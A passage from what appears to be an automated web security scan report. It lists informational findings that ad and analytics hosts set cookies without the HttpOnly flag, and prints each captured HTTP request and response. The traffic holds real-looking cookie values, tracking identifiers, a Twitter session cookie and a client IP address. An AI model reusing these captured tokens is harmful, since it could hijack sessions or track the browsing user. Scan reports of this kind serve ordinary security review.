gdJY9A0IdHokXL7J0Mmy2WsbYykEXuJ5TLZrQfCj++okG0ybH6VzVsQgImDiWCDg9a6rHcnivUpUbwYuUsT1lVKa9hrxhu2gfQi7961IlxJsBfQhDJn5YPvAG3fMPdpR6xxzieVQuvolnhhxznMndIfFc3a0sMwZ2ymntmGZJ3FQkpF4s2HSq/SzfCLgk4PaRPIcLizaWvmoHGfyFkAM0lXNiNs2Jjgk2yivn9eZvhZvKshtPqX2dmDXV3Kp4UYxikKg2y05nN+xuwvl5YUGIp4hrpKpO/O/XhgmctTfjycOsYcBdzNc3VqkhAYB2nl8uFmC72E="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:47 GMT

GIF89a.............!.......,...........D..;
9.24. http://ads.undertone.com/aj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /aj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aj?&zoneid=15137&cb=90357477147&t=1305189046.674&fv=10&x=0&y=0&cw=1020&ch=269&loc=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3_S1AJfxMx2CJFEtQQMeQV5diyE3zkHiXbsKc_2m5v-uGbX8yi3ngzw; __qca=P0-1848023807-1303907386404; UTLIA=205196.lkzsem-4837_194060.lkb9de-4837_174883.lkxrxg-14739; _UTLIA[207784]=lkzsf9-14863; UTID=55d8a64add1842aca1cd9b7525609299; UTPROFILES=15104%2317%3A4_2%7C22%3A14_6%2C4%7C23%3A14_6%2C4%7C1022%3A14_6%2C4_4_2_1%7C1023%3A14_6%2C4_4_2_1%2C2%7C1077%3A1%7C1146%3A14_6%2C4_4_2_1%2C2%7C1147%3A14_6%2C4_4_2_1%2C2%7C1152%3A6%2C4_4_2_1%2C2%7C1155%3A14%7C1158%3A6%2C4_4_2_1%2C2%7C1724%3A6%2C4_4_2_1%2C2%7C1816%3A6%2C4%7C1913%3A2%2C3%7C2878%3A14_6%2C4_4_2_1%2C2%7C2881%3A14_6%2C4_4_2_1%2C2%7C2882%3A6%2C4_4_2_1%2C2%7C2886%3A14%7C2892%3A6%2C4_4_2_1%2C2%7C2894%3A14_6%2C4_4_2_1%2C2%7C2895%3A6%2C4_4_2_1%2C2%7C2896%3A6%2C4_4_2_1%2C2%7C2897%3A14_6%2C4_4_2_1%2C2%7C2898%3A14_6%2C4_4_2_1%2C2%7C2900%3A14%7C2901%3A14_6%2C4_4_2_1%2C2%7C2903%3A6%2C4_4_2_1%2C2%7C2909%3A14_6%2C4_4_2_1%2C2%7C2917%3A14%7C2918%3A6%2C4_4_2_1%2C2%7C2922%3A14_6%2C4_4_2_1%2C2%7C2923%3A14%7C2924%3A14_6%2C4_4_2_1%2C2%7C2925%3A14_6%2C4_4_2_1%2C2%7C2926%3A6%2C4_4_2_1%2C2

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 4917
Content-Type: text/javascript
Date: Thu, 12 May 2011 13:32:08 GMT
Connection: close
Set-Cookie: UTID=55d8a64add1842aca1cd9b7525609299; expires=Fri, 11-May-2012 13:32:08 GMT; path=/
Set-Cookie: _UTLIA[207784]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: UTLIA=207784.lkzsf9-14863_205196.lkzsem-4837_194060.lkb9de-4837_174883.lkxrxg-14739; expires=Sat, 11-Jun-2011 13:32:08 GMT; path=/
Set-Cookie: UTPROFILES=15106%2317%3A6_4%7C22%3A16_8%2C4%7C23%3A16_8%2C4%7C1022%3A16_8%2C4_6_4_3%7C1023%3A16_8%2C4_6_4_3%2C2%7C1077%3A3%7C1146%3A16_8%2C4_6_4_3%2C2%7C1147%3A16_8%2C4_6_4_3%2C2%7C1152%3A8%2C4_6_4_3%2C2%7C1155%3A16%7C1158%3A8%2C4_6_4_3%2C2%7C1724%3A8%2C4_6_4_3%2C2%7C1816%3A8%2C4%7C1913%3A4%2C3%7C2878%3A16_8%2C4_6_4_3%2C2%7C2881%3A16_8%2C4_6_4_3%2C2%7C2882%3A8%2C4_6_4_3%2C2%7C2886%3A16%7C2892%3A8%2C4_6_4_3%2C2%7C2894%3A16_8%2C4_6_4_3%2C2%7C2895%3A8%2C4_6_4_3%2C2%7C2896%3A8%2C4_6_4_3%2C2%7C2897%3A16_8%2C4_6_4_3%2C2%7C2898%3A16_8%2C4_6_4_3%2C2%7C2900%3A16%7C2901%3A16_8%2C4_6_4_3%2C2%7C2903%3A8%2C4_6_4_3%2C2%7C2909%3A16_8%2C4_6_4_3%2C2%7C2917%3A16%7C2918%3A8%2C4_6_4_3%2C2%7C2922%3A16_8%2C4_6_4_3%2C2%7C2923%3A16%7C2924%3A16_8%2C4_6_4_3%2C2%7C2925%3A16_8%2C4_6_4_3%2C2%7C2926%3A8%2C4_6_4_3%2C2; expires=Wed, 10-Aug-2011 13:32:08 GMT; path=/

document.ut_synched=31210;document.write("<"+"script type=\"text/javascript\">function pr_swfver(){\nvar osf,osfd,i,axo=1,v=0,nv=navigator;if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins[\"Shockwav
...[SNIP]...
9.25. http://ads.undertone.com/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fc.php?dp=8&pid=D,T,5349,5344,5341,5335,5334,5327,5326,5323,2972,2683,2681,2680,2430,2428,2425,2420,1836,1835,1832,1829 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3_S1AJfxMx2CJFEtQQMeQV5diyE3zkHiXbsKc_2m5v-uGbX8yi3ngzw; __qca=P0-1848023807-1303907386404; UTLIA=207784.lkzsf9-14863_205196.lkzsem-4837_194060.lkb9de-4837_174883.lkxrxg-14739; _UTLIA[191502]=ll347n-15137; _UTLIA[191501]=ll348c-15138; UTID=55d8a64add1842aca1cd9b7525609299; UTPROFILES=15106%2317%3A6_4%7C22%3A16_8%2C4%7C23%3A16_8%2C4%7C845%3A1%7C1022%3A16_8%2C4_6_4_3%7C1023%3A16_8%2C4_6_4_3%2C2%7C1077%3A3%7C1146%3A16_8%2C4_6_4_3%2C2%7C1147%3A16_8%2C4_6_4_3%2C2%7C1152%3A8%2C4_6_4_3%2C2%7C1155%3A16%7C1158%3A8%2C4_6_4_3%2C2%7C1724%3A8%2C4_6_4_3%2C2%7C1816%3A8%2C4%7C1913%3A4%2C3%7C2878%3A16_8%2C4_6_4_3%2C2%7C2881%3A16_8%2C4_6_4_3%2C2%7C2882%3A8%2C4_6_4_3%2C2%7C2886%3A16%7C2892%3A8%2C4_6_4_3%2C2%7C2894%3A16_8%2C4_6_4_3%2C2%7C2895%3A8%2C4_6_4_3%2C2%7C2896%3A8%2C4_6_4_3%2C2%7C2897%3A16_8%2C4_6_4_3%2C2%7C2898%3A16_8%2C4_6_4_3%2C2%7C2900%3A16%7C2901%3A16_8%2C4_6_4_3%2C2%7C2903%3A8%2C4_6_4_3%2C2%7C2909%3A16_8%2C4_6_4_3%2C2%7C2917%3A16%7C2918%3A8%2C4_6_4_3%2C2%7C2922%3A16_8%2C4_6_4_3%2C2%7C2923%3A16%7C2924%3A16_8%2C4_6_4_3%2C2%7C2925%3A16_8%2C4_6_4_3%2C2%7C2926%3A8%2C4_6_4_3%2C2

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:56 GMT
Connection: close
Set-Cookie: UTID=55d8a64add1842aca1cd9b7525609299; expires=Fri, 11-May-2012 13:31:56 GMT; path=/
Set-Cookie: UTPROFILES=15106%2317%3A6_4%7C22%3A16_8%2C4%7C23%3A16_8%2C4%7C1022%3A16_8%2C4_6_4_3%7C1023%3A16_8%2C4_6_4_3%2C2%7C1077%3A3%7C1146%3A16_8%2C4_6_4_3%2C2%7C1147%3A16_8%2C4_6_4_3%2C2%7C1152%3A8%2C4_6_4_3%2C2%7C1155%3A16%7C1158%3A8%2C4_6_4_3%2C2%7C1724%3A8%2C4_6_4_3%2C2%7C1816%3A8%2C4%7C1913%3A4%2C3%7C2878%3A16_8%2C4_6_4_3%2C2%7C2881%3A16_8%2C4_6_4_3%2C2%7C2882%3A8%2C4_6_4_3%2C2%7C2886%3A16%7C2892%3A8%2C4_6_4_3%2C2%7C2894%3A16_8%2C4_6_4_3%2C2%7C2895%3A8%2C4_6_4_3%2C2%7C2896%3A8%2C4_6_4_3%2C2%7C2897%3A16_8%2C4_6_4_3%2C2%7C2898%3A16_8%2C4_6_4_3%2C2%7C2900%3A16%7C2901%3A16_8%2C4_6_4_3%2C2%7C2903%3A8%2C4_6_4_3%2C2%7C2909%3A16_8%2C4_6_4_3%2C2%7C2917%3A16%7C2918%3A8%2C4_6_4_3%2C2%7C2922%3A16_8%2C4_6_4_3%2C2_1%7C2923%3A16%7C2924%3A16_8%2C4_6_4_3%2C2_1%7C2925%3A16_8%2C4_6_4_3%2C2_1%7C2926%3A8%2C4_6_4_3%2C2_1; expires=Wed, 10-Aug-2011 13:31:56 GMT; path=/

GIF89a.............!.......,...........D..;
9.26. http://ads.undertone.com/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=191501&campaignid=31210&zoneid=15138&UTLIA=1&cb=9674115ded4b4114add04c28bb0567a2&bk=ll347o&id=6e71z3o27cnh1ioxqreihytn2 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3_S1AJfxMx2CJFEtQQMeQV5diyE3zkHiXbsKc_2m5v-uGbX8yi3ngzw; __qca=P0-1848023807-1303907386404; UTLIA=207784.lkzsf9-14863_205196.lkzsem-4837_194060.lkb9de-4837_174883.lkxrxg-14739; UTPROFILES=15106%2317%3A6_4%7C22%3A16_8%2C4%7C23%3A16_8%2C4%7C1022%3A16_8%2C4_6_4_3%7C1023%3A16_8%2C4_6_4_3%2C2%7C1077%3A3%7C1146%3A16_8%2C4_6_4_3%2C2%7C1147%3A16_8%2C4_6_4_3%2C2%7C1152%3A8%2C4_6_4_3%2C2%7C1155%3A16%7C1158%3A8%2C4_6_4_3%2C2%7C1724%3A8%2C4_6_4_3%2C2%7C1816%3A8%2C4%7C1913%3A4%2C3%7C2878%3A16_8%2C4_6_4_3%2C2%7C2881%3A16_8%2C4_6_4_3%2C2%7C2882%3A8%2C4_6_4_3%2C2%7C2886%3A16%7C2892%3A8%2C4_6_4_3%2C2%7C2894%3A16_8%2C4_6_4_3%2C2%7C2895%3A8%2C4_6_4_3%2C2%7C2896%3A8%2C4_6_4_3%2C2%7C2897%3A16_8%2C4_6_4_3%2C2%7C2898%3A16_8%2C4_6_4_3%2C2%7C2900%3A16%7C2901%3A16_8%2C4_6_4_3%2C2%7C2903%3A8%2C4_6_4_3%2C2%7C2909%3A16_8%2C4_6_4_3%2C2%7C2917%3A16%7C2918%3A8%2C4_6_4_3%2C2%7C2922%3A16_8%2C4_6_4_3%2C2%7C2923%3A16%7C2924%3A16_8%2C4_6_4_3%2C2%7C2925%3A16_8%2C4_6_4_3%2C2%7C2926%3A8%2C4_6_4_3%2C2; _UTLIA[191502]=ll347n-15137; UTID=55d8a64add1842aca1cd9b7525609299

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:23 GMT
Connection: close
Set-Cookie: _UTLIA[191501]=ll34bn-15138; expires=Sat, 11-Jun-2011 13:33:23 GMT; path=/
Set-Cookie: UTID=55d8a64add1842aca1cd9b7525609299; expires=Fri, 11-May-2012 13:33:23 GMT; path=/

GIF89a.............!.......,...........D..;
9.27. http://ads.undertone.com/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=191502&campaignid=31210&zoneid=15137&UTLIA=1&cb=9cf6cc0b37d240a786a08ea55497158f&bk=ll347b&id=5jwh0duijqd7vngjkwzq6zqds HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3_S1AJfxMx2CJFEtQQMeQV5diyE3zkHiXbsKc_2m5v-uGbX8yi3ngzw; __qca=P0-1848023807-1303907386404; UTID=55d8a64add1842aca1cd9b7525609299; UTLIA=207784.lkzsf9-14863_205196.lkzsem-4837_194060.lkb9de-4837_174883.lkxrxg-14739; UTPROFILES=15106%2317%3A6_4%7C22%3A16_8%2C4%7C23%3A16_8%2C4%7C1022%3A16_8%2C4_6_4_3%7C1023%3A16_8%2C4_6_4_3%2C2%7C1077%3A3%7C1146%3A16_8%2C4_6_4_3%2C2%7C1147%3A16_8%2C4_6_4_3%2C2%7C1152%3A8%2C4_6_4_3%2C2%7C1155%3A16%7C1158%3A8%2C4_6_4_3%2C2%7C1724%3A8%2C4_6_4_3%2C2%7C1816%3A8%2C4%7C1913%3A4%2C3%7C2878%3A16_8%2C4_6_4_3%2C2%7C2881%3A16_8%2C4_6_4_3%2C2%7C2882%3A8%2C4_6_4_3%2C2%7C2886%3A16%7C2892%3A8%2C4_6_4_3%2C2%7C2894%3A16_8%2C4_6_4_3%2C2%7C2895%3A8%2C4_6_4_3%2C2%7C2896%3A8%2C4_6_4_3%2C2%7C2897%3A16_8%2C4_6_4_3%2C2%7C2898%3A16_8%2C4_6_4_3%2C2%7C2900%3A16%7C2901%3A16_8%2C4_6_4_3%2C2%7C2903%3A8%2C4_6_4_3%2C2%7C2909%3A16_8%2C4_6_4_3%2C2%7C2917%3A16%7C2918%3A8%2C4_6_4_3%2C2%7C2922%3A16_8%2C4_6_4_3%2C2%7C2923%3A16%7C2924%3A16_8%2C4_6_4_3%2C2%7C2925%3A16_8%2C4_6_4_3%2C2%7C2926%3A8%2C4_6_4_3%2C2

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:32:35 GMT
Connection: close
Set-Cookie: _UTLIA[191502]=ll34ab-15137; expires=Sat, 11-Jun-2011 13:32:35 GMT; path=/
Set-Cookie: UTID=55d8a64add1842aca1cd9b7525609299; expires=Fri, 11-May-2012 13:32:35 GMT; path=/

GIF89a.............!.......,...........D..;
9.28. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/tr/10759-119438-1104-0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/tr/10759-119438-1104-0?mpt=2011.05.12.13.27.52 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10759:1104/15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Sun, 12-May-2013 5:04:07 GMT; path=/; domain=.mediaplex.com;
Content-Type: image/gif
Content-Length: 49
Date: Thu, 12 May 2011 13:28:13 GMT

GIF89a...................!.......,...........T..;
9.29. http://analytics.apnewsregistry.com/analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.apnewsregistry.com
Path:   /analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/ HTTP/1.1
Host: analytics.apnewsregistry.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uciv1=4e974cc2-0d47-4e41-93f4-be0dc63e9ba6

Response

HTTP/1.1 303 See Other
Cache-Control: private
Date: Thu, 12 May 2011 13:31:25 GMT
Location: http://d503lhn9b3612.cloudfront.net/pixel.gif
P3P: CP="NOI PSAo OUR IND COM NAV STA"
Server: Microsoft-IIS/7.0
Set-Cookie: uciv1=4e974cc2-0d47-4e41-93f4-be0dc63e9ba6; domain=apnewsregistry.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive

9.30. http://analytics.apnewsregistry.com/analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.apnewsregistry.com
Path:   /analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A HTTP/1.1
Host: analytics.apnewsregistry.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uciv1=4e974cc2-0d47-4e41-93f4-be0dc63e9ba6

Response

HTTP/1.1 303 See Other
Cache-Control: private
Date: Thu, 12 May 2011 13:30:34 GMT
Location: http://d503lhn9b3612.cloudfront.net/pixel.gif
P3P: CP="NOI PSAo OUR IND COM NAV STA"
Server: Microsoft-IIS/7.0
Set-Cookie: uciv1=4e974cc2-0d47-4e41-93f4-be0dc63e9ba6; domain=apnewsregistry.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive

9.31. http://apex.com.com/aws/rest/v1.0/offerScript  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apex.com.com
Path:   /aws/rest/v1.0/offerScript

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aws/rest/v1.0/offerScript?refUrl=&sId=2&ptId=2100&onId=13616&asId=207595&edId=0 HTTP/1.1
Host: apex.com.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:26 GMT
Server: Apache-Coyote/1.1
Set-Cookie: arrowLat=1305206906893; Domain=.cnet.com; Expires=Fri, 11-May-2012 13:28:26 GMT; Path=/
Set-Cookie: arrowSpc=1; Domain=.cnet.com; Expires=Sat, 11-Jun-2011 13:28:26 GMT; Path=/
Content-Type: text/plain
Content-Length: 30

// no offer available for user
9.32. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=reganlee&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1305207062912=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1304617828.1304721594.4; k=173.193.214.243.1305161327073854

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305207166-55904-42371
X-RateLimit-Limit: 150
ETag: "f16b5231d379a8faccd3bcb746c7a175"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 13:32:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01698
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 0ea1ebd7e3c3292a1466a749293e9011989f70f4
X-RateLimit-Reset: 1305210664
Set-Cookie: original_referer=Vs%2BEmu1btvuAmQsknyZNdVheq0tL9VpNzq2cJ7f%2Frku5HhKsM0INw8sY%2FgQVZoF0ZSkQVzHgBByWAa84JbboQ%2FY%2BxV5zsEAQMgn2qZyQ36Y%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK3WaOQvAToHaWQiJWUxNWMxZGZmNGM4NjYx%250AN2Q1NGM2MzhmNzhiM2MxODMzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa39a0ccad9bf49b70a696e63158d18af30456d6; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 7125

TWTR.Widget.receiveCallback_1([{"text":"Review of book Insight http:\/\/orangeorbreview.blogspot.com\/2011\/05\/book-review-insight.html","id_str":"68512311291289601","created_at":"Thu May 12 03:06:22
...[SNIP]...
9.33. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1305206896.017,wait-%3E10000,&1305206897376 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
